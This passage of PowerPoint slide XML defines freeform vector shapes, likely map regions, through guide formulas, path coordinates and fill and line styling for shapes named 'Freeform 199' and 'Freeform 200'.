                  <a:gd name="T0" fmla="*/ 15 w 95"/>
                  <a:gd name="T1" fmla="*/ 94 h 101"/>
                  <a:gd name="T2" fmla="*/ 18 w 95"/>
                  <a:gd name="T3" fmla="*/ 84 h 101"/>
                  <a:gd name="T4" fmla="*/ 17 w 95"/>
                  <a:gd name="T5" fmla="*/ 79 h 101"/>
                  <a:gd name="T6" fmla="*/ 4 w 95"/>
                  <a:gd name="T7" fmla="*/ 69 h 101"/>
                  <a:gd name="T8" fmla="*/ 0 w 95"/>
                  <a:gd name="T9" fmla="*/ 67 h 101"/>
                  <a:gd name="T10" fmla="*/ 3 w 95"/>
                  <a:gd name="T11" fmla="*/ 60 h 101"/>
                  <a:gd name="T12" fmla="*/ 3 w 95"/>
                  <a:gd name="T13" fmla="*/ 53 h 101"/>
                  <a:gd name="T14" fmla="*/ 4 w 95"/>
                  <a:gd name="T15" fmla="*/ 51 h 101"/>
                  <a:gd name="T16" fmla="*/ 9 w 95"/>
                  <a:gd name="T17" fmla="*/ 44 h 101"/>
                  <a:gd name="T18" fmla="*/ 6 w 95"/>
                  <a:gd name="T19" fmla="*/ 39 h 101"/>
                  <a:gd name="T20" fmla="*/ 7 w 95"/>
                  <a:gd name="T21" fmla="*/ 36 h 101"/>
                  <a:gd name="T22" fmla="*/ 13 w 95"/>
                  <a:gd name="T23" fmla="*/ 38 h 101"/>
                  <a:gd name="T24" fmla="*/ 17 w 95"/>
                  <a:gd name="T25" fmla="*/ 37 h 101"/>
                  <a:gd name="T26" fmla="*/ 12 w 95"/>
                  <a:gd name="T27" fmla="*/ 31 h 101"/>
                  <a:gd name="T28" fmla="*/ 12 w 95"/>
                  <a:gd name="T29" fmla="*/ 26 h 101"/>
                  <a:gd name="T30" fmla="*/ 12 w 95"/>
                  <a:gd name="T31" fmla="*/ 22 h 101"/>
                  <a:gd name="T32" fmla="*/ 5 w 95"/>
                  <a:gd name="T33" fmla="*/ 16 h 101"/>
                  <a:gd name="T34" fmla="*/ 10 w 95"/>
                  <a:gd name="T35" fmla="*/ 8 h 101"/>
                  <a:gd name="T36" fmla="*/ 16 w 95"/>
                  <a:gd name="T37" fmla="*/ 4 h 101"/>
                  <a:gd name="T38" fmla="*/ 23 w 95"/>
                  <a:gd name="T39" fmla="*/ 10 h 101"/>
                  <a:gd name="T40" fmla="*/ 28 w 95"/>
                  <a:gd name="T41" fmla="*/ 5 h 101"/>
                  <a:gd name="T42" fmla="*/ 34 w 95"/>
                  <a:gd name="T43" fmla="*/ 0 h 101"/>
                  <a:gd name="T44" fmla="*/ 37 w 95"/>
                  <a:gd name="T45" fmla="*/ 2 h 101"/>
                  <a:gd name="T46" fmla="*/ 38 w 95"/>
                  <a:gd name="T47" fmla="*/ 7 h 101"/>
                  <a:gd name="T48" fmla="*/ 41 w 95"/>
                  <a:gd name="T49" fmla="*/ 8 h 101"/>
                  <a:gd name="T50" fmla="*/ 47 w 95"/>
                  <a:gd name="T51" fmla="*/ 5 h 101"/>
                  <a:gd name="T52" fmla="*/ 53 w 95"/>
                  <a:gd name="T53" fmla="*/ 6 h 101"/>
                  <a:gd name="T54" fmla="*/ 56 w 95"/>
                  <a:gd name="T55" fmla="*/ 11 h 101"/>
                  <a:gd name="T56" fmla="*/ 63 w 95"/>
                  <a:gd name="T57" fmla="*/ 17 h 101"/>
                  <a:gd name="T58" fmla="*/ 68 w 95"/>
                  <a:gd name="T59" fmla="*/ 16 h 101"/>
                  <a:gd name="T60" fmla="*/ 75 w 95"/>
                  <a:gd name="T61" fmla="*/ 13 h 101"/>
                  <a:gd name="T62" fmla="*/ 85 w 95"/>
                  <a:gd name="T63" fmla="*/ 14 h 101"/>
                  <a:gd name="T64" fmla="*/ 91 w 95"/>
                  <a:gd name="T65" fmla="*/ 18 h 101"/>
                  <a:gd name="T66" fmla="*/ 95 w 95"/>
                  <a:gd name="T67" fmla="*/ 38 h 101"/>
                  <a:gd name="T68" fmla="*/ 90 w 95"/>
                  <a:gd name="T69" fmla="*/ 48 h 101"/>
                  <a:gd name="T70" fmla="*/ 84 w 95"/>
                  <a:gd name="T71" fmla="*/ 65 h 101"/>
                  <a:gd name="T72" fmla="*/ 87 w 95"/>
                  <a:gd name="T73" fmla="*/ 75 h 101"/>
                  <a:gd name="T74" fmla="*/ 91 w 95"/>
                  <a:gd name="T75" fmla="*/ 89 h 101"/>
                  <a:gd name="T76" fmla="*/ 88 w 95"/>
                  <a:gd name="T77" fmla="*/ 86 h 101"/>
                  <a:gd name="T78" fmla="*/ 86 w 95"/>
                  <a:gd name="T79" fmla="*/ 88 h 101"/>
                  <a:gd name="T80" fmla="*/ 82 w 95"/>
                  <a:gd name="T81" fmla="*/ 88 h 101"/>
                  <a:gd name="T82" fmla="*/ 72 w 95"/>
                  <a:gd name="T83" fmla="*/ 86 h 101"/>
                  <a:gd name="T84" fmla="*/ 47 w 95"/>
                  <a:gd name="T85" fmla="*/ 88 h 101"/>
                  <a:gd name="T86" fmla="*/ 35 w 95"/>
                  <a:gd name="T87" fmla="*/ 92 h 101"/>
                  <a:gd name="T88" fmla="*/ 17 w 95"/>
                  <a:gd name="T89" fmla="*/ 101 h 101"/>
                  <a:gd name="T90" fmla="*/ 15 w 95"/>
                  <a:gd name="T91" fmla="*/ 101 h 101"/>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95"/>
                  <a:gd name="T139" fmla="*/ 0 h 101"/>
                  <a:gd name="T140" fmla="*/ 95 w 95"/>
                  <a:gd name="T141" fmla="*/ 101 h 101"/>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95" h="101">
                    <a:moveTo>
                      <a:pt x="15" y="101"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="101"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36467" name="Freeform 199"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2651" y="2701"/>
                <a:ext cx="126" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 85 w 126"/>
                  <a:gd name="T1" fmla="*/ 65 h 90"/>
                  <a:gd name="T2" fmla="*/ 77 w 126"/>
                  <a:gd name="T3" fmla="*/ 68 h 90"/>
                  <a:gd name="T4" fmla="*/ 60 w 126"/>
                  <a:gd name="T5" fmla="*/ 68 h 90"/>
                  <a:gd name="T6" fmla="*/ 43 w 126"/>
                  <a:gd name="T7" fmla="*/ 70 h 90"/>
                  <a:gd name="T8" fmla="*/ 44 w 126"/>
                  <a:gd name="T9" fmla="*/ 86 h 90"/>
                  <a:gd name="T10" fmla="*/ 43 w 126"/>
                  <a:gd name="T11" fmla="*/ 90 h 90"/>
                  <a:gd name="T12" fmla="*/ 34 w 126"/>
                  <a:gd name="T13" fmla="*/ 86 h 90"/>
                  <a:gd name="T14" fmla="*/ 24 w 126"/>
                  <a:gd name="T15" fmla="*/ 88 h 90"/>
                  <a:gd name="T16" fmla="*/ 18 w 126"/>
                  <a:gd name="T17" fmla="*/ 90 h 90"/>
                  <a:gd name="T18" fmla="*/ 12 w 126"/>
                  <a:gd name="T19" fmla="*/ 88 h 90"/>
                  <a:gd name="T20" fmla="*/ 8 w 126"/>
                  <a:gd name="T21" fmla="*/ 81 h 90"/>
                  <a:gd name="T22" fmla="*/ 2 w 126"/>
                  <a:gd name="T23" fmla="*/ 79 h 90"/>
                  <a:gd name="T24" fmla="*/ 0 w 126"/>
                  <a:gd name="T25" fmla="*/ 77 h 90"/>
                  <a:gd name="T26" fmla="*/ 2 w 126"/>
                  <a:gd name="T27" fmla="*/ 74 h 90"/>
                  <a:gd name="T28" fmla="*/ 5 w 126"/>
                  <a:gd name="T29" fmla="*/ 61 h 90"/>
                  <a:gd name="T30" fmla="*/ 5 w 126"/>
                  <a:gd name="T31" fmla="*/ 54 h 90"/>
                  <a:gd name="T32" fmla="*/ 10 w 126"/>
                  <a:gd name="T33" fmla="*/ 52 h 90"/>
                  <a:gd name="T34" fmla="*/ 16 w 126"/>
                  <a:gd name="T35" fmla="*/ 48 h 90"/>
                  <a:gd name="T36" fmla="*/ 21 w 126"/>
                  <a:gd name="T37" fmla="*/ 31 h 90"/>
                  <a:gd name="T38" fmla="*/ 26 w 126"/>
                  <a:gd name="T39" fmla="*/ 28 h 90"/>
                  <a:gd name="T40" fmla="*/ 32 w 126"/>
                  <a:gd name="T41" fmla="*/ 33 h 90"/>
                  <a:gd name="T42" fmla="*/ 36 w 126"/>
                  <a:gd name="T43" fmla="*/ 30 h 90"/>
                  <a:gd name="T44" fmla="*/ 43 w 126"/>
                  <a:gd name="T45" fmla="*/ 19 h 90"/>
                  <a:gd name="T46" fmla="*/ 49 w 126"/>
                  <a:gd name="T47" fmla="*/ 14 h 90"/>
                  <a:gd name="T48" fmla="*/ 55 w 126"/>
                  <a:gd name="T49" fmla="*/ 17 h 90"/>
                  <a:gd name="T50" fmla="*/ 59 w 126"/>
                  <a:gd name="T51" fmla="*/ 11 h 90"/>
                  <a:gd name="T52" fmla="*/ 68 w 126"/>
                  <a:gd name="T53" fmla="*/ 6 h 90"/>
                  <a:gd name="T54" fmla="*/ 80 w 126"/>
                  <a:gd name="T55" fmla="*/ 0 h 90"/>
                  <a:gd name="T56" fmla="*/ 85 w 126"/>
                  <a:gd name="T57" fmla="*/ 2 h 90"/>
                  <a:gd name="T58" fmla="*/ 91 w 126"/>
                  <a:gd name="T59" fmla="*/ 8 h 90"/>
                  <a:gd name="T60" fmla="*/ 94 w 126"/>
                  <a:gd name="T61" fmla="*/ 18 h 90"/>
                  <a:gd name="T62" fmla="*/ 100 w 126"/>
                  <a:gd name="T63" fmla="*/ 23 h 90"/>
                  <a:gd name="T64" fmla="*/ 105 w 126"/>
                  <a:gd name="T65" fmla="*/ 28 h 90"/>
                  <a:gd name="T66" fmla="*/ 103 w 126"/>
                  <a:gd name="T67" fmla="*/ 33 h 90"/>
                  <a:gd name="T68" fmla="*/ 111 w 126"/>
                  <a:gd name="T69" fmla="*/ 40 h 90"/>
                  <a:gd name="T70" fmla="*/ 117 w 126"/>
                  <a:gd name="T71" fmla="*/ 41 h 90"/>
                  <a:gd name="T72" fmla="*/ 125 w 126"/>
                  <a:gd name="T73" fmla="*/ 48 h 90"/>
                  <a:gd name="T74" fmla="*/ 124 w 126"/>
                  <a:gd name="T75" fmla="*/ 57 h 90"/>
                  <a:gd name="T76" fmla="*/ 119 w 126"/>
                  <a:gd name="T77" fmla="*/ 61 h 90"/>
                  <a:gd name="T78" fmla="*/ 111 w 126"/>
                  <a:gd name="T79" fmla="*/ 61 h 90"/>
                  <a:gd name="T80" fmla="*/ 105 w 126"/>
                  <a:gd name="T81" fmla="*/ 67 h 90"/>
                  <a:gd name="T82" fmla="*/ 103 w 126"/>
                  <a:gd name="T83" fmla="*/ 69 h 90"/>
                  <a:gd name="T84" fmla="*/ 96 w 126"/>
                  <a:gd name="T85" fmla="*/ 67 h 9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26"/>
                  <a:gd name="T130" fmla="*/ 0 h 90"/>
                  <a:gd name="T131" fmla="*/ 126 w 126"/>
                  <a:gd name="T132" fmla="*/ 90 h 90"/>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26" h="90">
                    <a:moveTo>
                      <a:pt x="89" y="66"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="85" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="66"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36468" name="Freeform 200"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2651" y="2701"/>
                <a:ext cx="126" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 85 w 126"/>
                  <a:gd name="T1" fmla="*/ 65 h 90"/>
                  <a:gd name="T2" fmla="*/ 77 w 126"/>
                  <a:gd name="T3" fmla="*/ 68 h 90"/>
                  <a:gd name="T4" fmla="*/ 60 w 126"/>
                  <a:gd name="T5" fmla="*/ 68 h 90"/>
                  <a:gd name="T6" fmla="*/ 43 w 126"/>
                  <a:gd name="T7" fmla="*/ 70 h 90"/>
                  <a:gd name="T8" fmla="*/ 44 w 126"/>
                  <a:gd name="T9" fmla="*/ 86 h 90"/>
                  <a:gd name="T10" fmla="*/ 43 w 126"/>
                  <a:gd name="T11" fmla="*/ 90 h 90"/>
                  <a:gd name="T12" fmla="*/ 34 w 126"/>
                  <a:gd name="T13" fmla="*/ 86 h 90"/>
                  <a:gd name="T14" fmla="*/ 24 w 126"/>
                  <a:gd name="T15" fmla="*/ 88 h 90"/>
                  <a:gd name="T16" fmla="*/ 18 w 126"/>
                  <a:gd name="T17" fmla="*/ 90 h 90"/>
                  <a:gd name="T18" fmla="*/ 12 w 126"/>
                  <a:gd name="T19" fmla="*/ 88 h 90"/>
                  <a:gd name="T20" fmla="*/ 8 w 126"/>
                  <a:gd name="T21" fmla="*/ 81 h 90"/>
                  <a:gd name="T22" fmla="*/ 2 w 126"/>
                  <a:gd name="T23" fmla="*/ 79 h 90"/>
                  <a:gd name="T24" fmla="*/ 0 w 126"/>
                  <a:gd name="T25" fmla="*/ 77 h 90"/>
                  <a:gd name="T26" fmla="*/ 2 w 126"/>
                  <a:gd name="T27" fmla="*/ 74 h 90"/>
                  <a:gd name="T28" fmla="*/ 5 w 126"/>
                  <a:gd name="T29" fmla="*/ 61 h 90"/>
                  <a:gd name="T30" fmla="*/ 5 w 126"/>
                  <a:gd name="T31" fmla="*/ 54 h 90"/>
                  <a:gd name="T32" fmla="*/ 10 w 126"/>
                  <a:gd name="T33" fmla="*/ 52 h 90"/>
                  <a:gd name="T34" fmla="*/ 16 w 126"/>
                  <a:gd name="T35" fmla="*/ 48 h 90"/>
                  <a:gd name="T36" fmla="*/ 21 w 126"/>
                  <a:gd name="T37" fmla="*/ 31 h 90"/>
                  <a:gd name="T38" fmla="*/ 26 w 126"/>
                  <a:gd name="T39" fmla="*/ 28 h 90"/>
                  <a:gd name="T40" fmla="*/ 32 w 126"/>
                  <a:gd name="T41" fmla="*/ 33 h 90"/>
                  <a:gd name="T42" fmla="*/ 36 w 126"/>
                  <a:gd name="T43" fmla="*/ 30 h 90"/>
                  <a:gd name="T44" fmla="*/ 43 w 126"/>
                  <a:gd name="T45" fmla="*/ 19 h 90"/>
                  <a:gd name="T46" fmla="*/ 49 w 126"/>
                  <a:gd name="T47" fmla="*/ 14 h 90"/>
                  <a:gd name="T48" fmla="*/ 55 w 126"/>
                  <a:gd name="T49" fmla="*/ 17 h 90"/>
                  <a:gd name="T50" fmla="*/ 59 w 126"/>
                  <a:gd name="T51" fmla="*/ 11 h 90"/>
                  <a:gd name="T52" fmla="*/ 68 w 126"/>
                  <a:gd name="T53" fmla="*/ 6 h 90"/>
                  <a:gd name="T54" fmla="*/ 80 w 126"/>
